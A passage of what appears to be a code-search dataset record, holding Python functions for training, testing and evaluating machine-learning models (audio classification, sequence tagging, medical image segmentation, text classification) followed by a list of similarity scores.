self.x_df)\n\n shap_contributions(model, self.x_df, explainer)", "def main(config):\n input_data = config[\"input_data\"]\n\n # Separate OBS from model datasets\n # (and check there is only one obs dataset)\n obs = [v for v in input_data.values() if v[\"project\"] == \"OBS\"]\n if len(obs) != 1:\n msg = f\"Expected exactly 1 OBS dataset: found {len(obs)}\"\n raise RuntimeError(msg)\n clim_file = obs[0][\"filename\"]\n\n models = group_metadata(\n [v for v in input_data.values() if v[\"project\"] != \"OBS\"],\n \"dataset\")\n\n for model_dataset, group in models.items():\n # 'model_dataset' is the name of the model dataset.\n # 'group' is a list of dictionaries containing metadata.\n logger.info(\"Processing data for %s\", model_dataset)\n model_file = [item[\"filename\"] for item in group]\n\n # Input filenames for provenance\n ancestors = flatten([model_file, clim_file])\n\n # Calculate metrics\n metrics = land_sm_top(clim_file, model_file, model_dataset, config,\n ancestors)\n\n # Write metrics\n metrics_dir = os.path.join(\n config[\"plot_dir\"],\n f\"{config['exp_model']}_vs_{config['control_model']}\",\n config[\"area\"],\n model_dataset,\n )\n\n write_metrics(metrics_dir, metrics, config, ancestors)", "def run_test(models, data):\n num_correct = 0.0\n num_total = 0.0\n\n # initialize lists to put in predictions & results for confusion matrix \n predicted_labels = []\n actual_labels = []\n langlist = models.keys()\n for ai, actual_lang in enumerate(langlist):\n test_files = open(os.path.join('traintestsplit', actual_lang+'.testlist')).read().split()\n print 'Testing', len(test_files), 'files from', actual_lang\n for filename in test_files:\n logprobs = {} # dict: total log prob of this file under each model \n for test_lang in langlist:\n logprobs[test_lang] = apply_model(models[test_lang], data[actual_lang][filename+'.npytxt'])\n predicted_lang = max(logprobs.items(), key=lambda x:x[1])[0]\n # insert prediction (of lang index) into predicted list \n predicted_labels.append(langlist.index(predicted_lang))\n actual_labels.append(ai)\n if actual_lang == predicted_lang:\n num_correct += 1\n num_total += 1\n\n print len(filter(lambda x:x==ai, predicted_labels[-len(test_files):])), 'correct'\n\n print\n print 'Accuracy', num_correct*100/num_total\n\n #CONFUSION MATRIX (y_test, y_pred) -> (actual label, predictions) \n cm = confusion_matrix(actual_labels, predicted_labels)\n cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n # display confusion stats by lang (TODO: visualize with matplotlib) \n print '*'*20\n for ai, 
actual_lang in enumerate(langlist):\n print actual_lang, 'confusion:'\n for pi, predicted_lang in enumerate(langlist):\n print '{0}: {1:.2f}%'.format(predicted_lang, cm_normalized[ai, pi]*100)\n print '*'*20", "def runmodel(model, patient_index=-1, frequency=0.4, quiet=False, silent=False, normalized=False, filter_on=False,\n print_example_vector=False, save_reconstruction=False, adc_on=False, dwi_lvl=None):\n\n modelname = model.__class__.__name__\n\n # Gather the types of data to be used in the predictions\n\n if silent:\n quiet = True\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: making training data\".format(model=modelname, n_patients=n_patients, patient=patient_index+1)\n\n masks = get_masks(data)\n\n if normalized:\n t2 = normalize_t2(data)\n else:\n t2 = get_t2(data)\n\n if patient_index == -1:\n patient_index = n_patients - 1\n\n image_set_total = [t2]\n\n if filter_on:\n t2_filtered = get_filtered_t2(data, frequency=frequency)\n image_set_total.append(t2_filtered)\n\n if adc_on:\n adc = get_adc(data)\n image_set_total.append(adc)\n\n if dwi_lvl is not None:\n dwi = get_dwi(data, weight=dwi_lvl)\n image_set_total.append(dwi)\n\n X_train = []\n y_train = []\n\n # Create training data\n\n for i in range(n_patients):\n\n if i == patient_index:\n continue\n\n else:\n\n if len(image_set_total) > 1:\n image_set = [imset[i] for imset in image_set_total]\n X_train_single, y_train_single = create_multiparametric_dataset(image_set, masks[i], n, prune=prune)\n else:\n X_train_single, y_train_single = create_dataset(t2[i], masks[i], n, prune=prune)\n\n X_train += X_train_single\n y_train += y_train_single\n\n if print_example_vector:\n ex_vec = X_train[0]\n print \"length of example vector:\", len(ex_vec)\n print ex_vec\n\n # Create testing data\n\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: making testing data\".format(model=modelname, n_patients=n_patients, patient=patient_index+1)\n\n test_mask = masks[patient_index]\n test_t2 = t2[patient_index]\n\n if len(image_set_total) > 1:\n image_set = [imset[patient_index] for imset in image_set_total]\n X_test, y_test = create_multiparametric_dataset(image_set, test_mask, n, prune=prune, save_pxs=True)\n else:\n X_test, y_test = create_dataset(test_t2, test_mask, n, prune=prune, save_pxs=True)\n\n # Train, predict, and score\n\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: training using {n_pts} points\".format(model=modelname, n_patients=n_patients, patient=patient_index+1, n_pts=len(y_train))\n model.fit(X_train, y_train)\n\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: testing using {n_pts} points\".format(model=modelname, n_patients=n_patients, patient=patient_index+1, n_pts=len(y_test))\n y_pred = model.predict(X_test)\n\n score = roc_auc_score(y_true=y_test, y_score=y_pred)\n\n if not silent:\n print \"{model}: patient {patient}/{n_patients}: score {score}\".format(model=modelname, n_patients=n_patients, score=score, patient=patient_index+1)\n\n if save_reconstruction:\n if not silent:\n print \"{model}: patient {patient}/{n_patients}: saving reconstructed mask\".format(model=modelname, n_patients=n_patients, patient=patient_index+1)\n reconstruction = reconstruct(test_mask, y_pred, active_pixels[patient_index])\n else:\n reconstruction = None\n\n return score, reconstruction", "def on_train_begin(self, logs=None):", "def on_train_begin(self, logs=None):", "def create_melspectrogram_dataset(label_folder='electronic_music/Trance_label/Train/', 
save_folder='song_mel_label_data',\n sr=44100, n_mels=128, n_fft=2048, hop_length=512, song_duration=180.0,\n create_data=False):\n if create_data:\n # get list of all labels\n os.makedirs(save_folder, exist_ok=True)\n labels = [path for path in os.listdir(label_folder) if os.path.isdir(label_folder + path)]\n\n # iterate through all lables, songs and find mel spectrogram\n for label in labels:\n print('{} \\n'.format(label))\n label_path = os.path.join(label_folder, label)\n label_songs = os.listdir(label_path)\n\n for song in label_songs:\n print(song)\n song_path = os.path.join(label_path, song)\n\n # Create mel spectrogram for song_duration in the middle of the song and convert it to the log scale\n audio = MP3(song_path)\n audio_lenght = int(audio.info.length)\n audio_middle = (audio_lenght - int(song_duration))/2\n y, sr = librosa.load(song_path, sr=sr, offset=audio_middle, duration=song_duration)\n S = librosa.feature.melspectrogram(y, sr=sr, n_mels=n_mels, n_fft=n_fft, hop_length=hop_length)\n log_S = librosa.logamplitude(S, ref_power=1.0)\n data = (label, log_S, song)\n\n # Save each song\n save_name = label + '_%%-%%_' + song\n with open(os.path.join(save_folder, save_name), 'wb') as fp:\n dill.dump(data, fp)", "def test_forfatal_functions(self):\n logging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\n logging.getLogger(\"batchglm\").setLevel(logging.WARNING)\n logging.getLogger(\"diffxpy\").setLevel(logging.WARNING)\n\n num_observations = 10\n num_features = 2\n\n sim = Simulator(num_observations=num_observations, num_features=num_features)\n sim.generate_sample_description(num_batches=0, num_conditions=0)\n sim.generate()\n\n random_sample_description = pd.DataFrame({\n \"pseudotime\": np.random.random(size=sim.nobs),\n \"batch\": np.random.randint(2, size=sim.nobs)\n })\n\n test = de.test.continuous_1d(\n data=sim.X,\n continuous=\"pseudotime\",\n df=3,\n formula_loc=\"~ 1 + pseudotime + batch\",\n formula_scale=\"~ 1\",\n factor_loc_totest=\"pseudotime\",\n test=\"wald\",\n sample_description=random_sample_description,\n quick_scale=True,\n batch_size=None,\n training_strategy=\"DEFAULT\",\n dtype=\"float64\"\n )\n\n summary = test.summary()\n ids = test.gene_ids\n\n # 1. Test all additional functions which depend on model computation:\n # 1.1. Only continuous model:\n temp = test.log_fold_change(genes=ids, nonnumeric=False)\n temp = test.max(genes=ids, nonnumeric=False)\n temp = test.min(genes=ids, nonnumeric=False)\n temp = test.argmax(genes=ids, nonnumeric=False)\n temp = test.argmin(genes=ids, nonnumeric=False)\n temp = test.summary(nonnumeric=False)\n # 1.2. 
Full model:\n temp = test.log_fold_change(genes=ids, nonnumeric=True)\n temp = test.max(genes=ids, nonnumeric=True)\n temp = test.min(genes=ids, nonnumeric=True)\n temp = test.argmax(genes=ids, nonnumeric=True)\n temp = test.argmin(genes=ids, nonnumeric=True)\n temp = test.summary(nonnumeric=True)\n\n return True", "def test_char_lstm(self, resource_loader):\n config = {\n \"model_type\": \"tagger\",\n \"example_type\": ENTITY_EXAMPLE_TYPE,\n \"label_type\": ENTITIES_LABEL_TYPE,\n \"model_settings\": {\"classifier_type\": \"lstm-pytorch\"},\n \"params\": { # default token_spans_pooling_type is \"first\"\n \"embedder_type\": \"glove\", \"emb_dim\": 30, \"tokenizer_type\": \"char-tokenizer\"},\n }\n examples = self.labeled_data.queries()\n labels = self.labeled_data.entities()\n\n with pytest.raises(ValueError):\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n\n config = {**config, \"params\": {\n \"embedder_type\": None, \"emb_dim\": 30, \"tokenizer_type\": \"char-tokenizer\"}\n }\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"add_terminals\": \"True\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"mean\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"use_crf_layer\": False}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)", "def test_training(self):\n\t\tpass", "def main():\n\n args = define_and_process_args()\n print('\\n', 'ARGUMENTS', '\\n\\n', args, '\\n')\n\n log_dir = get_log_dir(args)\n print('\\n', 'LOG DIRECTORY', '\\n\\n', log_dir, '\\n')\n\n standardized_data_path = os.path.join(args.data_dir, args.data_filename)\n if not os.path.exists(standardized_data_path):\n message = '%s does not exist.' % standardized_data_path\n raise ValueError(message)\n\n dataset = data.Dataset(standardized_data_path)\n train_raw_seqs, test_raw_seqs = dataset.get_splits(args.test_users)\n train_triplets = [data.prepare_raw_seq(seq) for seq in train_raw_seqs]\n test_triplets = [data.prepare_raw_seq(seq) for seq in test_raw_seqs]\n\n train_input_seqs, train_reset_seqs, train_label_seqs = zip(*train_triplets)\n test_input_seqs, test_reset_seqs, test_label_seqs = zip(*test_triplets)\n\n Model = eval('models.' 
+ args.model_type + 'Model')\n input_size = dataset.input_size\n target_size = dataset.num_classes\n\n # This is just to satisfy a low-CPU requirement on our cluster\n # when using GPUs.\n if 'CUDA_VISIBLE_DEVICES' in os.environ:\n config = tf.ConfigProto(intra_op_parallelism_threads=2,\n inter_op_parallelism_threads=2)\n else:\n config = None\n\n with tf.Session(config=config) as sess:\n model = Model(input_size, target_size, args.num_layers,\n args.hidden_layer_size, args.init_scale,\n args.dropout_keep_prob)\n optimizer = optimizers.Optimizer(\n model.loss, args.num_train_sweeps, args.initial_learning_rate,\n args.num_initial_sweeps, args.num_sweeps_per_decay,\n args.decay_factor, args.max_global_grad_norm)\n train(sess, model, optimizer, log_dir, args.batch_size,\n args.num_sweeps_per_summary, args.num_sweeps_per_save,\n train_input_seqs, train_reset_seqs, train_label_seqs,\n test_input_seqs, test_reset_seqs, test_label_seqs)", "def test():\n # load dataset and model\n X, observed_y = load_data('../data/dev.txt')\n\n model = pickle.load(open('test.model', 'rb'))\n model.traverse()\n\n # predict labels for dataset\n preds = model.predict(X)\n\n # print(preds)\n # output model predictions\n np.savetxt('test.predictions', preds, fmt='%s')", "def run(self):\n print('Running test of the markups in different views')\n\n #\n # first load the data\n #\n import SampleData\n sampleDataLogic = SampleData.SampleDataLogic()\n print(\"Getting MR Head Volume\")\n mrHeadVolume = sampleDataLogic.downloadMRHead()\n\n #\n # link the viewers\n #\n sliceLogic = slicer.app.layoutManager().sliceWidget('Red').sliceLogic()\n compositeNode = sliceLogic.GetSliceCompositeNode()\n compositeNode.SetLinkedControl(1)\n\n #\n # MR Head in the background\n #\n sliceLogic.StartSliceCompositeNodeInteraction(1)\n compositeNode.SetBackgroundVolumeID(mrHeadVolume.GetID())\n sliceLogic.EndSliceCompositeNodeInteraction()\n\n #\n # switch to conventional layout\n #\n lm = slicer.app.layoutManager()\n lm.setLayout(2)\n\n # create a fiducial list\n displayNode = slicer.vtkMRMLMarkupsDisplayNode()\n slicer.mrmlScene.AddNode(displayNode)\n fidNode = slicer.vtkMRMLMarkupsFiducialNode()\n slicer.mrmlScene.AddNode(fidNode)\n fidNode.SetAndObserveDisplayNodeID(displayNode.GetID())\n\n # make it active\n selectionNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLSelectionNodeSingleton\")\n if (selectionNode is not None):\n selectionNode.SetReferenceActivePlaceNodeID(fidNode.GetID())\n\n # add some known points to it\n eye1 = [33.4975, 79.4042, -10.2143]\n eye2 = [-31.283, 80.9652, -16.2143]\n nose = [4.61944, 114.526, -33.2143]\n index = fidNode.AddFiducialFromArray(eye1)\n fidNode.SetNthFiducialLabel(index, \"eye-1\")\n index = fidNode.AddFiducialFromArray(eye2)\n fidNode.SetNthFiducialLabel(index, \"eye-2\")\n # hide the second eye as a test of visibility flags\n fidNode.SetNthFiducialVisibility(index, 0)\n index = fidNode.AddFiducialFromArray(nose)\n fidNode.SetNthFiducialLabel(index, \"nose\")\n\n self.logicDelayDisplay(\"Placed 3 fiducials\")\n\n # self.printViewAndSliceNodes()\n\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 1\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n #\n # switch to 2 3D views layout\n #\n lm.setLayout(15)\n self.logicDelayDisplay(\"Switched to 2 3D views\")\n # self.printViewAndSliceNodes()\n\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0 or self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 0:\n 
self.logicDelayDisplay(\"Test failed: widget is not visible in view 1 and 2\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n #\n # show only in view 2\n #\n displayNode.AddViewNodeID(\"vtkMRMLViewNode2\")\n self.logicDelayDisplay(\"Showing only in view 2\")\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 1:\n self.logicDelayDisplay(\"Test failed: widget is not supposed to be visible in view 1\")\n # self.printViewNodeIDs(displayNode)\n return False\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 2\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n #\n # remove it so show in all\n #\n displayNode.RemoveAllViewNodeIDs()\n self.logicDelayDisplay(\"Showing in both views\")\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0 or self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 1 and 2\")\n self.printViewNodeIDs(displayNode)\n return False\n\n #\n # show only in view 1\n #\n displayNode.AddViewNodeID(\"vtkMRMLViewNode1\")\n self.logicDelayDisplay(\"Showing only in view 1\")\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 1:\n self.logicDelayDisplay(\"Test failed: widget is not supposed to be visible in view 2\")\n # self.printViewNodeIDs(displayNode)\n return False\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 1\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n # switch back to conventional\n lm.setLayout(2)\n self.logicDelayDisplay(\"Switched back to conventional layout\")\n # self.printViewAndSliceNodes()\n\n # test of the visibility in slice views\n displayNode.RemoveAllViewNodeIDs()\n\n # jump to the last fiducial\n slicer.modules.markups.logic().JumpSlicesToNthPointInMarkup(fidNode.GetID(), index, 1)\n # refocus the 3D cameras as well\n slicer.modules.markups.logic().FocusCamerasOnNthPointInMarkup(fidNode.GetID(), index)\n\n # show only in red\n displayNode.AddViewNodeID('vtkMRMLSliceNodeRed')\n self.logicDelayDisplay(\"Show only in red slice\")\n if self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeRed') != 1:\n self.logicDelayDisplay(\"Test failed: widget not displayed on red slice\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n # remove all, add green\n # print 'before remove all, after added red'\n # self.printViewNodeIDs(displayNode)\n displayNode.RemoveAllViewNodeIDs()\n # print 'after removed all'\n # self.printViewNodeIDs(displayNode)\n displayNode.AddViewNodeID('vtkMRMLSliceNodeGreen')\n self.logicDelayDisplay('Show only in green slice')\n if self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeRed') != 0 or self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeGreen') != 1:\n self.logicDelayDisplay(\"Test failed: widget not displayed only on green slice\")\n print '\\tred = ',self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeRed')\n print '\\tgreen =',self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeGreen')\n self.printViewNodeIDs(displayNode)\n return False\n\n return True", "def test_glove_lstm(self, resource_loader):\n config = {\n \"model_type\": \"tagger\",\n \"example_type\": ENTITY_EXAMPLE_TYPE,\n \"label_type\": ENTITIES_LABEL_TYPE,\n \"model_settings\": {\"classifier_type\": \"lstm-pytorch\"},\n \"params\": {\"embedder_type\": \"glove\"},\n }\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n examples = self.labeled_data.queries()\n labels = 
self.labeled_data.entities()\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"use_crf_layer\": False}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)", "def test_stage_0():\n\tra_1 = readImage(TRAIN_RAW_IMAGE_1)\n\tre_1 = readImage(TRAIN_RESULT_IMAGE_1)\n\n\tra_2 = readImage(TRAIN_RAW_IMAGE_2)\n\tre_2 = readImage(TRAIN_RESULT_IMAGE_2)\n\n\t# Uncomment below if more examples are required.\n\t# ra_3 = readImage(TRAIN_RAW_IMAGE_3)\n\t# re_3 = readImage(TRAIN_RESULT_IMAGE_3)\n\n\t# Uncomment below if the additional features are needed.\n\t# ra_1 += (\n\t# \tlaplace_operator(TRAIN_RAW_IMAGE_1),\\\n\t# \t# k_means(TRAIN_RAW_IMAGE_1)[0],\\\n\t# \t)\n\n\t# Uncomment below if the additional features are needed.\n\t# ra_2 += (\n\t# \tlaplace_operator(TRAIN_RAW_IMAGE_2),\\\n\t# \t# k_means(TRAIN_RAW_IMAGE_2)[0],\\\n\t# \t)\n\n\t# The prediction model is obtained and trained.\n\tengine = get_model((ra_1, ra_2,), (re_1, re_2,), model_type=SVM, percentage=0.1)\n\n\ttest_percentage = float(1) # how many tests\n\n\tra_1 = readImage(TEST_RAW_IMAGE_1)\n\n\t# Uncomment below if the additional features are needed.\n\t# ra_1 += (\n\t# \tlaplace_operator(TEST_RAW_IMAGE_1),\\\n\t# \t# k_means(TEST_RAW_IMAGE_1)[0],\\\n\t# \t)\n\n\tre_1 = readImage(TEST_RESULT_IMAGE_1)\n\n\t# ra_2 = readImage(TEST_RAW_IMAGE_2)\n\t# re_2 = readImage(TEST_RESULT_IMAGE_2)\n\n\tinput_vec = []\n\t# The features are extracted.\n\tinput_vec += buildFeatureArray_2(ra_1[0], ra_1[1], ra_1[2],\\\n\t\tRADIUS_ARRAY,\\\n\t\tadditional_feats=([] if len(ra_1) == 3 else ra_1[3:]))\n\n\tex_no = int(test_percentage * len(input_vec)) # actual number of the test sample\n\n\toutput_vec = []\n\toutput_vec += matrixToArray(re_1[0], lambda el: 1 if el == 255 else 0)\n\n\tprint('Will start predicting...')\n\n\tpredicted_vec = engine.predict(input_vec[:ex_no])\n\n\tcounter = float(0)\n\tfor y, p in zip(output_vec[:ex_no], predicted_vec[:ex_no]):\n\t\tif y == p: counter += 1\n\n\tprint('Accuracy: ' + str(counter/ex_no))\n\n\tpredicted_mat = arrayToMatrix( predicted_vec, len(re_1[0]), len(re_1[0][0]),\\\n\t\tlambda el: 255 if el == 1 else 0)\n\n\t# The predicted segmentation is saved.\n\tsave_rgb_img(\\\n\t np.array(predicted_mat).transpose(),\\\n\t np.array(predicted_mat).transpose(),\\\n\t np.array(predicted_mat).transpose(),\\\n\t 'pred.bmp',\\\n\t)", "def test_predictor():", "def evaluate(model, tokenizer, dataset, lines, output_test_file, batch_size=32):\n sampler = SequentialSampler(dataset)\n dataloader = DataLoader(dataset, sampler=eval_sampler, batch_size=batch_size)\n\n print(\"*** Evaluating ***\")\n eval_loss = 0.0\n num_steps = 0\n preds = None\n out_label_ids = None\n for i, batch in enumerate(dataloader):\n if i % 200 == 199:\n print(\"=\", end=\"\")\n if i % 5000 == 4999:\n print(\"[Step \" + str(i+1) + \" / \" + str(len(dataloader)) + \"] \" )\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n\n with torch.no_grad():\n labels = batch[3]\n outputs = model(input_ids=batch[0], attention_mask=batch[1], labels=labels)\n tmp_eval_loss, logits = outputs[:2]\n eval_loss += tmp_eval_loss.mean().item()\n \n num_steps += 1\n if preds is None:\n preds = logits.detach().cpu().numpy()\n out_label_ids = labels.detach().cpu().numpy()\n else:\n preds = 
np.append(preds, logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(out_label_ids, labels.detach().cpu().numpy(), axis=0)\n \n eval_loss = eval_loss / num_steps\n \n preds_label = np.argmax(preds, axis=1)\n \n accuracy = (preds_label == out_label_ids).mean()\n output_dir = os.path.dirname(output_test_file)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n with open(output_test_file, \"w\") as writer:\n all_logits = preds.tolist()\n for i, logit in enumerate(all_logits):\n line = '<CODESPLIT>'.join(\n [item.encode('ascii', 'ignore').decode('ascii') for item in lines[i]])\n\n writer.write(line + '<CODESPLIT>' + '<CODESPLIT>'.join([str(l) for l in logit]) + '\\n')\n print(\"Accuracy =\", str(accuracy))\n\n return accuracy" ]
[ "0.6325506", "0.6192102", "0.6124805", "0.60204524", "0.6009529", "0.5962141", "0.59607697", "0.59232557", "0.589596", "0.58899426", "0.58750546", "0.58347756", "0.5821097", "0.58149606", "0.5804652", "0.578651", "0.5777658", "0.57776195", "0.5773679", "0.5771149", "0.575928", "0.5745834", "0.57231796", "0.5720955", "0.5717427", "0.57144886", "0.5704706", "0.5701107", "0.56872004", "0.5677923", "0.56743366", "0.56485844", "0.5645845", "0.56344795", "0.5631731", "0.5630153", "0.56158537", "0.56141806", "0.5613516", "0.56131476", "0.5608466", "0.56011236", "0.55944824", "0.5592963", "0.55831075", "0.55828846", "0.5581233", "0.5580394", "0.556971", "0.55694324", "0.55687445", "0.55644363", "0.5561171", "0.55593586", "0.5556008", "0.5549844", "0.5542836", "0.5541267", "0.55329853", "0.5523869", "0.55151665", "0.5514203", "0.55114836", "0.5510725", "0.5508459", "0.5506405", "0.550558", "0.55040646", "0.55023104", "0.54980725", "0.5496414", "0.54847664", "0.54812825", "0.54718995", "0.5470682", "0.54703057", "0.5469593", "0.5468336", "0.54670376", "0.546448", "0.5462629", "0.545995", "0.54524875", "0.54522693", "0.54519683", "0.54507744", "0.5446045", "0.54368395", "0.5432702", "0.5432702", "0.5430789", "0.5430311", "0.54246503", "0.5419038", "0.54135334", "0.5407588", "0.5405331", "0.53971267", "0.53968245", "0.53873646", "0.53741443" ]
0.0
-1
Performs cross validation on a segmented logmel spectrogram trained model.
def cv(preds_path_stem, num_ensemble=1):
    fold_accs = []
    fold_c_matricies = []
    for fold in range(1, 6):
        data_val = load_dataset(
            f'Data/esc50_mel_wind_tfr/raw/fold_{fold}.tfrecords')
        pred_paths=[f'{preds_path_stem}preds_fold_{i}_{fold}.npy' for i in range(1, num_ensemble+1)]
        fold_acc, fold_c_matrix = test_wind_mel_model(pred_paths, data_val)
        fold_accs.append(fold_acc)
        fold_c_matricies.append(fold_c_matrix)
    cv_acc = np.mean(fold_accs)
    cv_acc_std = np.std(fold_accs)
    c_matrix = np.sum(fold_c_matricies, axis=0) / np.sum(fold_c_matricies)
    np.save(f'{preds_path_stem}cmatrix_{num_ensemble}.npy', c_matrix)
    print(f"The cross validation accuracy is {cv_acc:.4f} "
          f"+/- 1.96 * {cv_acc_std:.4f}")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run(self, df: pd.DataFrame, model: Any):\n print(f'Running cross validation with the following model:\\n{model}')\n\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n\n date_1 = datetime.datetime(year=2016, month=1, day=1)\n date_2 = datetime.datetime(year=2016, month=4, day=1)\n date_3 = datetime.datetime(year=2016, month=7, day=1)\n date_4 = datetime.datetime(year=2016, month=10, day=1)\n date_5 = datetime.datetime(year=2017, month=1, day=1)\n\n summaries: List[FoldSummary] = []\n\n for train_start, train_end, test_start, test_end in [\n (date_1, date_2, date_2, date_3),\n # (date_1, date_3, date_3, date_4),\n # (date_1, date_4, date_4, date_5)\n ]:\n print('Calculating train and test datasets')\n train_df = df[(df['timestamp'] >= train_start) & (df['timestamp'] < train_end)]\n test_df = df[(df['timestamp'] >= test_start) & (df['timestamp'] < test_end)]\n\n columns = list(train_df.columns)\n columns.remove('timestamp')\n columns.remove('meter_reading')\n\n print(columns)\n\n train_data = train_df[columns]\n test_data = test_df[columns]\n\n print(f'Fitting the model on train dataset of size {len(train_data)}')\n model.fit(train_data, train_df['meter_reading'])\n print(f'Predicting for test dataset of size {len(test_data)}')\n predictions = model.predict(test_data)\n\n score = self._calculate_score(predictions, test_df['meter_reading'])\n print(f'Score: {score}')\n\n summaries.append(FoldSummary(\n train_start=train_start,\n train_end=train_end,\n test_start=test_start,\n test_end=test_end,\n score=score\n ))\n\n filename = f'../resources/runs/{time.time()}.txt'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w+') as f:\n f.write(f'{model.__class__.__name__}\\n')\n f.write(f'{str(model.get_params())}\\n')\n for summary in summaries:\n f.write(f'Summary (\\n'\n f'\\ttrain start: {summary.train_start}\\n'\n f'\\ttrain end: {summary.train_end}\\n'\n f'\\ttest start: {summary.test_start}\\n'\n f'\\ttest end: {summary.test_end}\\n'\n f'\\tscore: {summary.score}\\n'\n f')\\n')\n\n print(summaries)\n\n return model", "def validate(args, data_loader, model, vocab, global_stats):\n eval_time = Timer()\n val_loss = AverageMeter()\n \n all_output_seqs = []\n all_target_seqs = []\n all_input_seqs = []\n \n for batch_idx, (input_idxs, target_idxs, input_tokens, _) in enumerate(data_loader):\n \n input_lengths = (input_idxs != 0).long().sum(dim=1)\n sorted_lengths, order = torch.sort(input_lengths, descending=True)\n \n # No grad mode\n with torch.no_grad():\n \n input_variable = Variable(input_idxs[order, :][:, :max(input_lengths)], requires_grad=False)\n target_variable = Variable(target_idxs[order, :], requires_grad=False)\n batch_size = input_variable.shape[0]\n # Sort the input token lists by length\n all_input_seqs.extend(np.array(input_tokens)[order.cpu().numpy()].tolist())\n \n output_log_probs, output_seqs = model(input_variable, list(sorted_lengths))\n all_output_seqs.extend(trim_seqs(output_seqs))\n all_target_seqs.extend([list(seq[seq > 0])] for seq in to_np(target_variable))\n\n flattened_log_probs = output_log_probs.view(batch_size * model.max_length, -1)\n batch_losses = model.citerion(flattened_log_probs, target_variable.contiguous().view(-1))\n\n val_loss.update(batch_losses[0], batch_size)\n \n bleu_score = corpus_bleu(all_target_seqs, all_output_seqs, smoothing_function=SmoothingFunction().method1)\n \n logger.info('dev valid : Epoch = %d | Loss = %.2f | Bleu = %.2f' %\n (global_stats['epoch'], val_loss.avg * 100, bleu_score * 100) +\n '| 
examples = %d | valid time = %.2f (s)' %\n (len(all_output_seqs), eval_time.time()))\n \n if args.display_samples:\n for sentence_input, sentence_pred, sentence_gold in zip(all_input_seqs[-5:], all_output_seqs[-5:], all_target_seqs[-5:]):\n sentence_gold = sentence_gold[0]\n \n sentence_gold = seq_to_string(np.array(sentence_gold), vocab.id2word, input_tokens=sentence_input.split(' '))\n sentence_pred = seq_to_string(np.array(sentence_pred), vocab.id2word, input_tokens=sentence_input.split(' '))\n \n print('Predicted : %s ' % (sentence_pred))\n print('-----------------------------------------------')\n print('Gold : %s ' % (sentence_gold))\n print('===============================================')\n\n \n return {'bleu_score': bleu_score * 100}", "def cross_validate_model(self, X_train, y_train):\n\n\t\t# Build a stratified k-fold cross-validator object\n\t\tskf = StratifiedKFold(n_splits=10, shuffle=True, random_state=42)\n\n\t\t'''\n\t\tEvaluate the score by cross-validation\n\t\tThis fits the classification model on the training data, according to the cross-validator\n\t\tand reports the scores.\n\t\tAlternative: sklearn.model_selection.cross_validate\n\t\t'''\n\t\tscores = cross_val_score(self.classifier, X_train, y_train, scoring='accuracy', cv=skf)\n\n\t\tprint(\"%.2f seconds: Cross-validation finished\" % time.process_time())\n\n\t\t# Log the cross-validation scores, the mean score and the 95% confidence interval, according to:\n\t\t# http://scikit-learn.org/stable/modules/cross_validation.html#computing-cross-validated-metrics\n\t\t# https://en.wikipedia.org/wiki/Standard_error#Assumptions_and_usage\n\t\t# print(\"Scores = %s\" % scores)\n\t\t# print(\"Accuracy: %0.2f (±%0.2f)\" % (scores.mean()*100, scores.std()*2*100))\n\t\t# ↳ https://docs.scipy.org/doc/numpy/reference/generated/numpy.std.html", "def 